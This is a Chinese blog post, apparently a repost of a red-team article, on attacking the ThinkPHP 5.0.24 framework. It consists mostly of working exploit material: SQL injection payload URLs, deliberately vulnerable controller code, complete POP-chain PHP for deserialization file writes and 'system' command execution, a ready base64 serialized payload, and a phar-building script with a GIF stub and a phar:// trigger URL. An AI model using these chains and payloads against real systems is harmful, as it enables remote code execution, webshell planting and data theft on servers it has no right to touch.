• thinkphp5 注入 反序列化写文件 phar反序列化

    原文出处:

    红队攻击第3篇 thinkphp5框架 注入 反序列化写文件 phar反序列化 (qq.com)

    1.SQL注入1

    1.  
    3.  
    4. namespace app\index\controller;
    5. use think\Db;
    6. class Index
    7. {
    8.     //sqli注入
    9.      public function test3(){
    10.       echo "test3";
    11.      $id = input('id');
    12.      $result = Db::name('users')->where("id = {$id}")->select();
    13.      echo "
      ";
    14.      var_dump($result);
    15.      echo "
    ";
  • }
  • }
    1.  
    2. http://www.tp5024.com/index.php/index/index/test3/id/1%20and%20updatexml(1,concat(0x7e,user(),0x7e),1)

    2.SQL注入2

    1.  
    3.  
    4. namespace app\index\controller;
    5. use think\Db;
    6. class Index
    7. {
    8.     public function index(){
    9.  
    10.     $username = request()->get('username');
    11.     $result = db('users')->where('username','exp',$username)->select();
    12.      echo "
      ";
    13.      var_dump($result);
    14.      echo "
    ";
  • }
  • }
    1.  
    2. http://www.tp123.com/index.php?m=index&c=index&username=)%20union%20select%20updatexml(1,concat(0x7,user(),0x7e),1)%23

     3.thinkphp5 反序列化写文件
    这里就以 thinkphp5.0.24 这个版本 其他版本大同小异

    1.  
    3. namespace think\process\pipes{
    4.     use think\model\Pivot;
    5.     use think\cache\driver\Memcached;
    6.     class Windows{
    7.         private $files = [];
    8.         public function __construct($path,$data)
    9. {
    10.             $this->files = [new Pivot($path,$data)];
    11.         }
    12.     }
    13.     $data = base64_encode('');
    14.     echo "tp5.0.24 write file pop Chain\n";
    15.     echo "The '=' cannot exist in the data,please check:".$data."\n";
    16.     $path = 'php://filter/convert.base64-decode/resource=./';
    17.     $aaa = new Windows($path,$data);
    18.     echo base64_encode(serialize($aaa));
    19.     echo "\n";
    20.     echo 'filename:'.md5('tag_'.md5(true)).'.php';
    21. }
    22. namespace think{
    23.     abstract class Model
    24.     {}
    25. }
    26. namespace think\model{
    27.     use think\Model;
    28.     class Pivot extends Model
    29. {
    30.         protected $append = [];
    31.         protected $error;
    32.         public $parent;
    33.         public function __construct($path,$data)
    34. {
    35.             $this->append['jelly'] = 'getError';
    36.             $this->error = new relation\BelongsTo($path,$data);
    37.             $this->parent = new \think\console\Output($path,$data);
    38.         }
    39.     }
    40.     abstract class Relation
    41. {}
    42. }
    43. namespace think\model\relation{
    44.     use think\db\Query;
    45.     use think\model\Relation;
    46.     abstract class OneToOne extends Relation
    47. {}
    48.     class BelongsTo extends OneToOne
    49. {
    50.         protected $selfRelation;
    51.         protected $query;
    52.         protected $bindAttr = [];
    53.         public function __construct($path,$data)
    54. {
    55.             $this->selfRelation = false;
    56.             $this->query = new Query($path,$data);
    57.             $this->bindAttr = ['a'.$data];
    58.         }
    59.     }
    60. }
    61. namespace think\db{
    62.     use think\console\Output;
    63.     class Query
    64. {
    65.         protected $model;
    66.         public function __construct($path,$data)
    67. {
    68.             $this->model = new Output($path,$data);
    69.         }
    70.     }
    71. }
    72. namespace think\console{
    73.     use think\session\driver\Memcache;
    74.     class Output
    75. {
    76.         protected $styles = [];
    77.         private $handle;
    78.         public function __construct($path,$data)
    79. {
    80.             $this->styles = ['getAttr'];
    81.             $this->handle = new Memcache($path,$data);
    82.         }
    83.     }
    84. }
    85. namespace think\session\driver{
    86.     use think\cache\driver\File;
    87.     use think\cache\driver\Memcached;
    88.     class Memcache
    89. {
    90.         protected $handler = null;
    91.         protected $config  = [
    92.             'expire'       => '',
    93.             'session_name' => '',
    94.         ];
    95.         public function __construct($path,$data)
    96. {
    97.             $this->handler = new Memcached($path,$data);
    98.         }
    99.     }
    100. }
    101. namespace think\cache\driver{
    102.     class Memcached
    103.     {
    104.         protected $handler;
    105.         protected $tag;
    106.         protected $options = [];
    107.         public function __construct($path,$data)
    108. {
    109.             $this->options = ['prefix'   => ''];
    110.             $this->handler = new File($path,$data);
    111.             $this->tag = true;
    112.         }
    113.     }
    114. }
    115. namespace think\cache\driver{
    116.     class File
    117.     {
    118.         protected $options = [];
    119.         protected $tag;
    120.         public function __construct($path,$data)
    121. {
    122.             $this->tag = false;
    123.             $this->options = [
    124.                 'expire'        => 0,
    125.                 'cache_subdir'  => false,
    126.                 'prefix'        => '',
    127.                 'path'          => $path,
    128.                 'data_compress' => false,
    129.             ];
    130.         }
    131.     }
    132. }

     在代码审计里如果发现unserialize这个函数传入的参数可控 就可以进行利用了 通常的情况下 是
    unserialize(加密函数(传入值)) 这种模式居多  这里就以这个为例子。

    1.  
    3. namespace app\index\controller;
    4.  
    5. class Index
    6. {
    7.     public function index()
    8. {
    9.  
    10.  
    11.         return "thinkphp 5.0.24";
    12.  
    13.  
    14.     }
    15.  
    16.     //反序列化 
    17.     public function test1(){
    18.            $id = unserialize(base64_decode($_GET['data']));
    19.            var_dump($id);
    20.     }
    21.     //反序列化 phar
    22.     public function test2(){
    23.         echo file_get_contents($_GET['file']);
    24.     }
    25.  
    26. }
    http://www.tp5024.com/index.php/index/index/test1?data=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

     4.thinkphp5 phar反序列化  
    首先 php里要关闭这个只读模式

    thinkphp5.0.24 还有其他链子

    1.  
    3. namespace think\process\pipes{
    4.     use think\model\Pivot;
    5.     ini_set('display_errors',1);
    6.     class Windows{
    7.         private $files = [];
    8.         public function __construct($function,$parameter)
    9. {
    10.             $this->files = [new Pivot($function,$parameter)];
    11.         }
    12.     }
    13.     $aaa = new Windows('system','whoami');
    14.     echo base64_encode(serialize($aaa));
    15. }
    16.  
    17.  
    18.  
    19.  
    20. namespace think{
    21.     abstract class Model
    22.     {}
    23. }
    24. namespace think\model{
    25.     use think\Model;
    26.     use think\console\Output;
    27.     class Pivot extends Model
    28. {
    29.         protected $append = [];
    30.         protected $error;
    31.         public $parent;
    32.         public function __construct($function,$parameter)
    33. {
    34.             $this->append['jelly'] = 'getError';
    35.             $this->error = new relation\BelongsTo($function,$parameter);
    36.             $this->parent = new Output($function,$parameter);
    37.         }
    38.     }
    39.     abstract class Relation
    40. {}
    41. }
    42. namespace think\model\relation{
    43.     use think\db\Query;
    44.     use think\model\Relation;
    45.     abstract class OneToOne extends Relation
    46. {}
    47.     class BelongsTo extends OneToOne
    48. {
    49.         protected $selfRelation;
    50.         protected $query;
    51.         protected $bindAttr = [];
    52.         public function __construct($function,$parameter)
    53. {
    54.             $this->selfRelation = false;
    55.             $this->query = new Query($function,$parameter);
    56.             $this->bindAttr = [''];
    57.         }
    58.     }
    59. }
    60. namespace think\db{
    61.     use think\console\Output;
    62.     class Query
    63. {
    64.         protected $model;
    65.         public function __construct($function,$parameter)
    66. {
    67.             $this->model = new Output($function,$parameter);
    68.         }
    69.     }
    70. }
    71. namespace think\console{
    72.     use think\session\driver\Memcache;
    73.     class Output
    74. {
    75.         protected $styles = [];
    76.         private $handle;
    77.         public function __construct($function,$parameter)
    78. {
    79.             $this->styles = ['getAttr'];
    80.             $this->handle = new Memcache($function,$parameter);
    81.         }
    82.     }
    83. }
    84. namespace think\session\driver{
    85.     use think\cache\driver\Memcached;
    86.     class Memcache
    87. {
    88.         protected $handler = null;
    89.         protected $config  = [
    90.             'expire'       => '',
    91.             'session_name' => '',
    92.         ];
    93.         public function __construct($function,$parameter)
    94. {
    95.             $this->handler = new Memcached($function,$parameter);
    96.         }
    97.     }
    98. }
    99. namespace think\cache\driver{
    100.     use think\Request;
    101.     class Memcached
    102. {
    103.         protected $handler;
    104.         protected $options = [];
    105.         protected $tag;
    106.         public function __construct($function,$parameter)
    107. {
    108.             // pop链中需要prefix存在,否则报错
    109.             $this->options = ['prefix'   => 'jelly/'];
    110.             $this->tag = true;
    111.             $this->handler = new Request($function,$parameter);
    112.         }
    113.     }
    114. }
    115. namespace think{
    116.     class Request
    117.     {
    118.         protected $get     = [];
    119.         protected $filter;
    120.         public function __construct($function,$parameter)
    121. {
    122.             $this->filter = $function;
    123.             $this->get = ["jelly"=>$parameter];
    124.         }
    125.     }
    126. }

     这个是命令执行的 将它改成 phar 生成的包

    1.  
    3. namespace think\process\pipes{
    4.     use think\model\Pivot;
    5.     ini_set('display_errors',1);
    6.     class Windows{
    7.         private $files = [];
    8.         public function __construct($function,$parameter)
    9. {
    10.             $this->files = [new Pivot($function,$parameter)];
    11.         }
    12.     }
    13.  
    14. }
    15.  
    16.  
    17.  
    18. namespace {
    19.     use think\process\pipes\Windows;
    20.     $data= new Windows('system', 'whoami');
    21.     unlink('exp2.phar');
    22.     $phar = new Phar('exp2.phar');
    23.     $phar -> stopBuffering();
    24.     $phar->setStub("GIF89a"."");//设置stub
    25.     $phar -> addFromString('test.txt','test');
    26.     $object = $data;
    27.     $phar -> setMetadata($object);
    28.     $phar -> stopBuffering();
    29. }
    30.  
    31.  
    32. namespace think{
    33.     abstract class Model
    34.     {}
    35. }
    36. namespace think\model{
    37.     use think\Model;
    38.     use think\console\Output;
    39.     class Pivot extends Model
    40. {
    41.         protected $append = [];
    42.         protected $error;
    43.         public $parent;
    44.         public function __construct($function,$parameter)
    45. {
    46.             $this->append['jelly'] = 'getError';
    47.             $this->error = new relation\BelongsTo($function,$parameter);
    48.             $this->parent = new Output($function,$parameter);
    49.         }
    50.     }
    51.     abstract class Relation
    52. {}
    53. }
    54. namespace think\model\relation{
    55.     use think\db\Query;
    56.     use think\model\Relation;
    57.     abstract class OneToOne extends Relation
    58. {}
    59.     class BelongsTo extends OneToOne
    60. {
    61.         protected $selfRelation;
    62.         protected $query;
    63.         protected $bindAttr = [];
    64.         public function __construct($function,$parameter)
    65. {
    66.             $this->selfRelation = false;
    67.             $this->query = new Query($function,$parameter);
    68.             $this->bindAttr = [''];
    69.         }
    70.     }
    71. }
    72. namespace think\db{
    73.     use think\console\Output;
    74.     class Query
    75. {
    76.         protected $model;
    77.         public function __construct($function,$parameter)
    78. {
    79.             $this->model = new Output($function,$parameter);
    80.         }
    81.     }
    82. }
    83. namespace think\console{
    84.     use think\session\driver\Memcache;
    85.     class Output
    86. {
    87.         protected $styles = [];
    88.         private $handle;
    89.         public function __construct($function,$parameter)
    90. {
    91.             $this->styles = ['getAttr'];
    92.             $this->handle = new Memcache($function,$parameter);
    93.         }
    94.     }
    95. }
    96. namespace think\session\driver{
    97.     use think\cache\driver\Memcached;
    98.     class Memcache
    99. {
    100.         protected $handler = null;
    101.         protected $config  = [
    102.             'expire'       => '',
    103.             'session_name' => '',
    104.         ];
    105.         public function __construct($function,$parameter)
    106. {
    107.             $this->handler = new Memcached($function,$parameter);
    108.         }
    109.     }
    110. }
    111. namespace think\cache\driver{
    112.     use think\Request;
    113.     class Memcached
    114. {
    115.         protected $handler;
    116.         protected $options = [];
    117.         protected $tag;
    118.         public function __construct($function,$parameter)
    119. {
    120.             // pop链中需要prefix存在,否则报错
    121.             $this->options = ['prefix'   => 'jelly/'];
    122.             $this->tag = true;
    123.             $this->handler = new Request($function,$parameter);
    124.         }
    125.     }
    126. }
    127. namespace think{
    128.     class Request
    129.     {
    130.         protected $get     = [];
    131.         protected $filter;
    132.         public function __construct($function,$parameter)
    133. {
    134.             $this->filter = $function;
    135.             $this->get = ["jelly"=>$parameter];
    136.         }
    137.     }
    138. }

     

    找个地方上传 审计文件操作函数 然后传入就可以了。

    一般的方法是上传图片 再用phar访问就能触发了

    1.  
    2. http://www.tp5024.com/index.php/index/index/test2?file=phar://exp2.gif/test.txt

     

  • 相关阅读:
    STM32F1课程学习
    CSS 语法
    pytorch神经网络工具箱
    面试官:小伙子你来介绍一下MyBatis
    数字化工厂建设方案探讨
    3.1网安学习第三阶段第一周回顾(个人学习记录使用)
    企业经营中如何降本增效,消灭内耗?
    go的解析命令行库go-flags
    深度学习:维度灾难(Curse Of Dimensionality)
    SQL Server 基础语法2(超详细!)
  • 原文地址:https://blog.csdn.net/weixin_57567655/article/details/127097871